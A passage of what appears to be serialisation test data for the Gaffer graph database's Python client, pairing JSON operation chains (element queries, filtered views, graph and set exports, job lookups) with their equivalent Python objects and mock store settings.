operations=[
g.GetAllElements(
view=g.View(
edges=[
g.ElementDefinition(
group="edge"
)
],
entities=[
]
)
),
g.ExportToOtherAuthorisedGraph(
graph_id="graph2"
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements",
"view" : {
"edges" : {
"edge" : { }
},
"entities" : { }
}
}, {
"class" : "uk.gov.gchq.gaffer.operation.export.graph.ExportToOtherAuthorisedGraph",
"graphId" : "newGraphId",
"parentSchemaIds" : [ "schemaId1" ],
"parentStorePropertiesId" : "storePropsId1"
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(
view=g.View(
entities=[
],
edges=[
g.ElementDefinition(
group="edge"
)
]
)
),
g.ExportToOtherAuthorisedGraph(
parent_schema_ids=[
"schemaId1"
],
graph_id="newGraphId",
parent_store_properties_id="storePropsId1"
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements",
"view" : {
"edges" : {
"edge" : { }
},
"entities" : { }
}
}, {
"class" : "uk.gov.gchq.gaffer.operation.export.graph.ExportToOtherGraph",
"graphId" : "newGraphId"
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(
view=g.View(
entities=[
],
edges=[
g.ElementDefinition(
group="edge"
)
]
)
),
g.ExportToOtherGraph(
graph_id="newGraphId"
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements",
"view" : {
"edges" : {
"edge" : { }
},
"entities" : { }
}
}, {
"class" : "uk.gov.gchq.gaffer.operation.export.graph.ExportToOtherGraph",
"graphId" : "newGraphId",
"schema" : {
"edges" : {
"edge" : {
"properties" : {
"count" : "int"
},
"groupBy" : [ ],
"directed" : "true",
"source" : "int",
"destination" : "int"
}
},
"entities" : {
"entity" : {
"properties" : {
"count" : "int"
},
"groupBy" : [ ],
"vertex" : "int"
}
},
"types" : {
"int" : {
"aggregateFunction" : {
"class" : "uk.gov.gchq.koryphe.impl.binaryoperator.Sum"
},
"class" : "java.lang.Integer"
},
"true" : {
"validateFunctions" : [ {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsTrue"
} ],
"class" : "java.lang.Boolean"
}
}
},
"storeProperties" : {
"accumulo.instance" : "someInstanceName",
"gaffer.cache.service.class" : "uk.gov.gchq.gaffer.cache.impl.HashMapCacheService",
"accumulo.password" : "password",
"accumulo.zookeepers" : "aZookeeper",
"gaffer.store.class" : "uk.gov.gchq.gaffer.accumulostore.MockAccumuloStore",
"gaffer.store.job.tracker.enabled" : "true",
"gaffer.store.operation.declarations" : "ExportToOtherGraphOperationDeclarations.json",
"gaffer.store.properties.class" : "uk.gov.gchq.gaffer.accumulostore.AccumuloProperties",
"accumulo.user" : "user01"
}
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(
view=g.View(
edges=[
g.ElementDefinition(
group="edge"
)
],
entities=[
]
)
),
g.ExportToOtherGraph(
schema={'edges': {
'edge': {'groupBy': [], 'directed': 'true',
'properties': {'count': 'int'},
'destination': 'int', 'source': 'int'}},
'entities': {
'entity': {'groupBy': [], 'vertex': 'int',
'properties': {'count': 'int'}}},
'types': {'true': {'validateFunctions': [{
'class': 'uk.gov.gchq.koryphe.impl.predicate.IsTrue'}],
'class': 'java.lang.Boolean'},
'int': {'aggregateFunction': {
'class': 'uk.gov.gchq.koryphe.impl.binaryoperator.Sum'},
'class': 'java.lang.Integer'}}},
store_properties={
'gaffer.store.job.tracker.enabled': 'true',
'gaffer.cache.service.class': 'uk.gov.gchq.gaffer.cache.impl.HashMapCacheService',
'gaffer.store.properties.class': 'uk.gov.gchq.gaffer.accumulostore.AccumuloProperties',
'accumulo.instance': 'someInstanceName',
'accumulo.zookeepers': 'aZookeeper',
'accumulo.password': 'password',
'gaffer.store.operation.declarations': 'ExportToOtherGraphOperationDeclarations.json',
'accumulo.user': 'user01',
'gaffer.store.class': 'uk.gov.gchq.gaffer.accumulostore.MockAccumuloStore'},
graph_id="newGraphId"
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements",
"view" : {
"edges" : {
"edge" : { }
},
"entities" : { }
}
}, {
"class" : "uk.gov.gchq.gaffer.operation.export.graph.ExportToOtherGraph",
"graphId" : "otherGafferRestApiGraphId",
"storeProperties" : {
"gaffer.host" : "localhost",
"gaffer.context-root" : "/rest/v1",
"gaffer.store.class" : "uk.gov.gchq.gaffer.proxystore.ProxyStore",
"gaffer.port" : "8081",
"gaffer.store.properties.class" : "uk.gov.gchq.gaffer.proxystore.ProxyProperties"
}
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(
view=g.View(
entities=[
],
edges=[
g.ElementDefinition(
group="edge"
)
]
)
),
g.ExportToOtherGraph(
graph_id="otherGafferRestApiGraphId",
store_properties={'gaffer.context-root': '/rest/v1',
'gaffer.store.class': 'uk.gov.gchq.gaffer.proxystore.ProxyStore',
'gaffer.host': 'localhost',
'gaffer.store.properties.class': 'uk.gov.gchq.gaffer.proxystore.ProxyProperties',
'gaffer.port': '8081'}
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements",
"view" : {
"edges" : {
"edge" : { }
},
"entities" : { }
}
}, {
"class" : "uk.gov.gchq.gaffer.operation.export.graph.ExportToOtherGraph",
"graphId" : "exportGraphId"
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(
view=g.View(
edges=[
g.ElementDefinition(
group="edge"
)
],
entities=[
]
)
),
g.ExportToOtherGraph(
graph_id="exportGraphId"
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements",
"view" : {
"edges" : {
"edge" : { }
},
"entities" : { }
}
}, {
"class" : "uk.gov.gchq.gaffer.operation.export.graph.ExportToOtherGraph",
"graphId" : "newGraphId",
"parentSchemaIds" : [ "exportSchemaId" ],
"parentStorePropertiesId" : "exportStorePropertiesId"
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(
view=g.View(
edges=[
g.ElementDefinition(
group="edge"
)
],
entities=[
]
)
),
g.ExportToOtherGraph(
parent_schema_ids=[
"exportSchemaId"
],
graph_id="newGraphId",
parent_store_properties_id="exportStorePropertiesId"
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.ExportToSet"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.GetSetExport",
"start" : 0
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.ExportToSet(),
g.DiscardOutput(),
g.GetSetExport(
start=0
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.ExportToSet"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.GetSetExport",
"start" : 2,
"end" : 4
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.ExportToSet(),
g.DiscardOutput(),
g.GetSetExport(
end=4,
start=2
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.ExportToSet",
"key" : "edges"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.ExportToSet",
"key" : "entities"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.GetExports",
"getExports" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.GetSetExport",
"key" : "edges",
"start" : 0
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.GetSetExport",
"key" : "entities",
"start" : 0
} ]
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.ExportToSet(
key="edges"
),
g.DiscardOutput(),
g.GetAllElements(),
g.ExportToSet(
key="entities"
),
g.DiscardOutput(),
g.GetExports(
get_exports=[
g.GetSetExport(
start=0,
key="edges"
),
g.GetSetExport(
start=0,
key="entities"
)
]
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.generate.GenerateElements",
"elementGenerator" : {
"class" : "uk.gov.gchq.gaffer.doc.operation.generator.ElementGenerator"
},
"input" : [ "1,1", "1,2,1" ]
}
''',
g.GenerateElements(
element_generator=g.ElementGenerator(
fields={},
class_name="uk.gov.gchq.gaffer.doc.operation.generator.ElementGenerator"
),
input=[
"1,1",
"1,2,1"
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.generate.GenerateElements",
"elementGenerator" : {
"class" : "uk.gov.gchq.gaffer.doc.operation.GenerateElementsExample$DomainObjectGenerator"
},
"input" : [ {
"class" : "uk.gov.gchq.gaffer.doc.operation.GenerateElementsExample$DomainObject1",
"a" : 1,
"c" : 1
}, {
"class" : "uk.gov.gchq.gaffer.doc.operation.GenerateElementsExample$DomainObject2",
"a" : 1,
"b" : 2,
"c" : 1
} ]
}
''',
g.GenerateElements(
element_generator=g.ElementGenerator(
class_name="uk.gov.gchq.gaffer.doc.operation.GenerateElementsExample$DomainObjectGenerator",
fields={}
),
input=[
{'c': 1,
'class': 'uk.gov.gchq.gaffer.doc.operation.GenerateElementsExample$DomainObject1',
'a': 1},
{'b': 2, 'c': 1,
'class': 'uk.gov.gchq.gaffer.doc.operation.GenerateElementsExample$DomainObject2',
'a': 1}
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.generate.GenerateObjects",
"elementGenerator" : {
"class" : "uk.gov.gchq.gaffer.doc.operation.generator.ObjectGenerator"
},
"input" : [ {
"group" : "entity",
"vertex" : 6,
"properties" : {
"count" : 1
},
"class" : "uk.gov.gchq.gaffer.data.element.Entity"
}, {
"group" : "edge",
"source" : 5,
"destination" : 6,
"directed" : true,
"properties" : {
"count" : 1
},
"class" : "uk.gov.gchq.gaffer.data.element.Edge"
} ]
}
''',
g.GenerateObjects(
input=[
g.Entity(
properties={'count': 1},
vertex=6,
group="entity"
),
g.Edge(
directed=True,
source=5,
properties={'count': 1},
group="edge",
destination=6
)
],
element_generator=g.ElementGenerator(
fields={},
class_name="uk.gov.gchq.gaffer.doc.operation.generator.ObjectGenerator"
)
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.generate.GenerateObjects",
"elementGenerator" : {
"class" : "uk.gov.gchq.gaffer.doc.operation.GenerateObjectsExample$DomainObjectGenerator"
},
"input" : [ {
"group" : "entity",
"vertex" : 6,
"properties" : {
"count" : 1
},
"class" : "uk.gov.gchq.gaffer.data.element.Entity"
}, {
"group" : "edge",
"source" : 5,
"destination" : 6,
"directed" : true,
"properties" : {
"count" : 1
},
"class" : "uk.gov.gchq.gaffer.data.element.Edge"
} ]
}
''',
g.GenerateObjects(
element_generator=g.ElementGenerator(
class_name="uk.gov.gchq.gaffer.doc.operation.GenerateObjectsExample$DomainObjectGenerator",
fields={}
),
input=[
g.Entity(
properties={'count': 1},
vertex=6,
group="entity"
),
g.Edge(
directed=True,
group="edge",
properties={'count': 1},
source=5,
destination=6
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAdjacentIds",
"input" : [ {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}
''',
g.GetAdjacentIds(
input=[
g.EntitySeed(
vertex=2
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAdjacentIds",
"includeIncomingOutGoing" : "OUTGOING",
"input" : [ {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}
''',
g.GetAdjacentIds(
input=[
g.EntitySeed(
vertex=2
)
],
include_incoming_out_going="OUTGOING"
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAdjacentIds",
"view" : {
"edges" : {
"edge" : {
"preAggregationFilterFunctions" : [ {
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"orEqualTo" : false,
"value" : 1
},
"selection" : [ "count" ]
} ]
}
},
"entities" : { }
},
"includeIncomingOutGoing" : "OUTGOING",
"input" : [ {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}
''',
g.GetAdjacentIds(
view=g.View(
entities=[
],
edges=[
g.ElementDefinition(
pre_aggregation_filter_functions=[
g.PredicateContext(
selection=[
"count"
],
predicate=g.IsMoreThan(
value=1,
or_equal_to=False
)
)
],
group="edge"
)
]
),
input=[
g.EntitySeed(
vertex=2
)
],
include_incoming_out_going="OUTGOING"
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}
''',
g.GetAllElements()
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements",
"view" : {
"edges" : {
"edge" : {
"preAggregationFilterFunctions" : [ {
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"orEqualTo" : false,
"value" : 2
},
"selection" : [ "count" ]
} ]
}
},
"entities" : {
"entity" : {
"preAggregationFilterFunctions" : [ {
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"orEqualTo" : false,
"value" : 2
},
"selection" : [ "count" ]
} ]
}
}
}
}
''',
g.GetAllElements(
view=g.View(
entities=[
g.ElementDefinition(
pre_aggregation_filter_functions=[
g.PredicateContext(
selection=[
"count"
],
predicate=g.IsMoreThan(value=2,
or_equal_to=False)
)
],
group="entity"
)
],
edges=[
g.ElementDefinition(
pre_aggregation_filter_functions=[
g.PredicateContext(
selection=[
"count"
],
predicate=g.IsMoreThan(value=2,
or_equal_to=False)
)
],
group="edge"
)
]
)
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.job.GetAllJobDetails"
}
''',
g.GetAllJobDetails()
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"source" : 2,
"destination" : 3,
"directedType" : "EITHER",
"matchedVertex" : "SOURCE",
"class" : "uk.gov.gchq.gaffer.operation.data.EdgeSeed"
} ],
"seedMatching": "EQUAL"
}
''',
g.GetElements(
input=[
g.EntitySeed(
vertex=2
),
g.EdgeSeed(
directed_type="EITHER",
source=2,
destination=3,
matched_vertex="SOURCE"
)
],
seed_matching=g.SeedMatchingType.EQUAL
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}],
"view": {
"allEdges": true,
"allEntities": true
}
}
''',
g.GetElements(
input=[
g.EntitySeed(
vertex=2
)
],
view=g.View(
all_edges=True,
all_entities=True
)
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}],
"view": {
"allEdges": true
}
}
''',
g.GetElements(
input=[
g.EntitySeed(
vertex=2
)
],
view=g.View(
all_edges=True,
all_entities=False
)
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}],
"view": {
"allEntities": true
}
}
''',
g.GetElements(
input=[
g.EntitySeed(
vertex=2
)
],
view=g.View(
all_entities=True
)
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : {
"edge" : {
"preAggregationFilterFunctions" : [ {
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"orEqualTo" : false,
"value" : 1
},
"selection" : [ "count" ]
} ]
}
},
"entities" : {
"entity" : {
"preAggregationFilterFunctions" : [ {
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"orEqualTo" : false,
"value" : 1
},
"selection" : [ "count" ]
} ]
}
}
},
"input" : [ {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"source" : 2,
"destination" : 3,
"directedType" : "EITHER",
"matchedVertex" : "SOURCE",
"class" : "uk.gov.gchq.gaffer.operation.data.EdgeSeed"
} ]
}
''',
g.GetElements(
view=g.View(
edges=[
g.ElementDefinition(
group="edge",
pre_aggregation_filter_functions=[
g.PredicateContext(
selection=[
"count"
],
predicate=g.IsMoreThan(value=1,
or_equal_to=False)
)
]
)
],
entities=[
g.ElementDefinition(
group="entity",
pre_aggregation_filter_functions=[
g.PredicateContext(
selection=[
"count"
],
predicate=g.IsMoreThan(value=1,
or_equal_to=False)
)
]
)
]
),
input=[
g.EntitySeed(
vertex=2
),
g.EdgeSeed(
source=2,
matched_vertex="SOURCE",
directed_type="EITHER",
destination=3
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}
''',
g.GetElements(
input=[
g.EntitySeed(
vertex=2
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"source" : 1,
"destination" : 2,
"directedType" : "EITHER",
"matchedVertex" : "SOURCE",
"class" : "uk.gov.gchq.gaffer.operation.data.EdgeSeed"
} ]
}
''',
g.GetElements(
input=[
g.EdgeSeed(
source=1,
directed_type="EITHER",
matched_vertex="SOURCE",
destination=2
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : {
"edge" : {
"preAggregationFilterFunctions" : [ {
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"orEqualTo" : false,
"value" : 1
},
"selection" : [ "count" ]
} ]
}
},
"entities" : {
"entity" : {
"preAggregationFilterFunctions" : [ {
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"orEqualTo" : false,
"value" : 1
},
"selection" : [ "count" ]
} ]
}
}
},
"input" : [ {
"source" : 1,
"destination" : 2,
"directedType" : "EITHER",
"matchedVertex" : "SOURCE",
"class" : "uk.gov.gchq.gaffer.operation.data.EdgeSeed"
} ]
}
''',
g.GetElements(
view=g.View(
edges=[
g.ElementDefinition(
group="edge",
pre_aggregation_filter_functions=[
g.PredicateContext(
predicate=g.IsMoreThan(
value=1,
or_equal_to=False
),
selection=[
"count"
]
)
]
)
],
entities=[
g.ElementDefinition(
group="entity",
pre_aggregation_filter_functions=[
g.PredicateContext(
selection=[
"count"
],
predicate=g.IsMoreThan(value=1,
or_equal_to=False)
)
]
)
]
),
input=[
g.EdgeSeed(
matched_vertex="SOURCE",
source=1,
directed_type="EITHER",
destination=2
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : { },
"entities" : {
"entity" : {
"preAggregationFilterFunctions" : [ {
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.Or",
"predicates" : [ {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsLessThan",
"orEqualTo" : false,
"value" : 2
}, {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"orEqualTo" : false,
"value" : 5
} ]
},
"selection" : [ "count" ]
} ]
}
}
},
"input" : [ {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"source" : 2,
"destination" : 3,
"directedType" : "EITHER",
"matchedVertex" : "SOURCE",
"class" : "uk.gov.gchq.gaffer.operation.data.EdgeSeed"
} ]
}
''',
g.GetElements(
view=g.View(
edges=[
],
entities=[
g.ElementDefinition(
pre_aggregation_filter_functions=[
g.PredicateContext(
selection=[
"count"
],
predicate=g.Or(
predicates=[
g.IsLessThan(
or_equal_to=False,
value=2
),
g.IsMoreThan(
or_equal_to=False,
value=5
)
]
)
)
],
group="entity"
)
]
),
input=[
g.EntitySeed(
vertex=2
),
g.EdgeSeed(
directed_type="EITHER",
matched_vertex="SOURCE",
source=2,
destination=3
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : {
"edge" : {
"preAggregationFilterFunctions" : [ {
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.Or",
"predicates" : [ {
"class" : "uk.gov.gchq.koryphe.tuple.predicate.IntegerTupleAdaptedPredicate",
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsLessThan",
"orEqualTo" : false,
"value" : 2
},
"selection" : [ 0 ]
}, {
"class" : "uk.gov.gchq.koryphe.tuple.predicate.IntegerTupleAdaptedPredicate",
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"orEqualTo" : false,
"value" : 3
},
"selection" : [ 1 ]
} ]
},
"selection" : [ "SOURCE", "DESTINATION" ]
} ]
}
},
"entities" : { }
},
"input" : [ {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}
''',
g.GetElements(
view=g.View(
edges=[
g.ElementDefinition(
pre_aggregation_filter_functions=[
g.PredicateContext(
predicate=g.Or(
predicates=[
g.NestedPredicate(
predicate=g.IsLessThan(
or_equal_to=False,
value=2
),
selection=[
0
]
),
g.NestedPredicate(
predicate=g.IsMoreThan(
or_equal_to=False,
value=3
),
selection=[
1
]
)
]
),
selection=[
"SOURCE",
"DESTINATION"
]
)
],
group="edge"
)
],
entities=[
]
),
input=[
g.EntitySeed(
vertex=2
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : {
"edge" : {
"properties" : [ "vertex|count" ],
"transientProperties" : {
"vertex|count" : "java.lang.String"
},
"transformFunctions" : [ {
"function" : {
"class" : "uk.gov.gchq.koryphe.impl.function.Concat",
"separator" : "|"
},
"selection" : [ "SOURCE", "count" ],
"projection" : [ "vertex|count" ]
} ]
}
},
"entities" : { }
},
"input" : [ {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}
''',
g.GetElements(
view=g.View(
edges=[
g.ElementDefinition(
transform_functions=[
g.FunctionContext(
projection=[
"vertex|count"
],
function=g.Concat(separator='|'),
selection=[
"SOURCE",
"count"
]
)
],
group="edge",
properties=[
"vertex|count"
],
transient_properties={
'vertex|count': 'java.lang.String'}
)
],
entities=[
]
),
input=[
g.EntitySeed(
vertex=2
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : {
"edge" : {
"excludeProperties" : [ "count" ],
"transientProperties" : {
"vertex|count" : "java.lang.String"
},
"transformFunctions" : [ {
"function" : {
"class" : "uk.gov.gchq.koryphe.impl.function.Concat",
"separator" : "|"
},
"selection" : [ "SOURCE", "count" ],
"projection" : [ "vertex|count" ]
} ]
}
},
"entities" : { }
},
"input" : [ {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}
''',
g.GetElements(
view=g.View(
entities=[
],
edges=[
g.ElementDefinition(
exclude_properties=[
"count"
],
transient_properties={
'vertex|count': 'java.lang.String'},
transform_functions=[
g.FunctionContext(
selection=[
"SOURCE",
"count"
],
function=g.Concat(separator='|'),
projection=[
"vertex|count"
]
)
],
group="edge"
)
]
),
input=[
g.EntitySeed(
vertex=2
)
]
)
],
[
'''
{
"class": "uk.gov.gchq.gaffer.operation.impl.get.GetFromEndpoint",
"endpoint": "http://mydata.io"
}
''',
g.GetFromEndpoint(endpoint="http://mydata.io")
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.ExportToGafferResultCache"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.GetGafferResultCacheExport",
"key" : "ALL"
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.ExportToGafferResultCache(),
g.DiscardOutput(),
g.GetGafferResultCacheExport(
key="ALL"
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.ExportToGafferResultCache"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.job.GetJobDetails"
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.ExportToGafferResultCache(),
g.DiscardOutput(),
g.GetJobDetails()
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.GetGafferResultCacheExport",
"jobId" : "675c6d4a-fba0-410b-8b84-6b40d0415555",
"key" : "ALL"
} ]
}
''',
g.OperationChain(
operations=[
g.GetGafferResultCacheExport(
key="ALL",
job_id="675c6d4a-fba0-410b-8b84-6b40d0415555"
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.ExportToGafferResultCache",
"key" : "edges"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.ExportToGafferResultCache",
"key" : "entities"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.GetExports",
"getExports" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.GetGafferResultCacheExport",
"key" : "edges"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.GetGafferResultCacheExport",
"key" : "entities"
} ]
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.ExportToGafferResultCache(
key="edges"
),
g.DiscardOutput(),
g.GetAllElements(),
g.ExportToGafferResultCache(
key="entities"
),
g.DiscardOutput(),
g.GetExports(
get_exports=[
g.GetGafferResultCacheExport(
key="edges"
),
g.GetGafferResultCacheExport(
key="entities"
)
]
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.job.GetJobDetails",
"jobId" : "18be2a20-5f36-4598-b522-1efc409b6b39"
}
''',
g.GetJobDetails(
job_id="18be2a20-5f36-4598-b522-1efc409b6b39"
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.job.GetJobResults",
"jobId" : "92932856-be96-41b3-85d8-bba7b6886284"
}
''',
g.GetJobResults(
job_id="92932856-be96-41b3-85d8-bba7b6886284"
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.ExportToSet"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.GetSetExport",
"start" : 0
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.ExportToSet(),
g.DiscardOutput(),
g.GetSetExport(
start=0
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.ExportToSet"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.GetSetExport",
"start" : 2,
"end" : 4
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.ExportToSet(),
g.DiscardOutput(),
g.GetSetExport(
start=2,
end=4
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
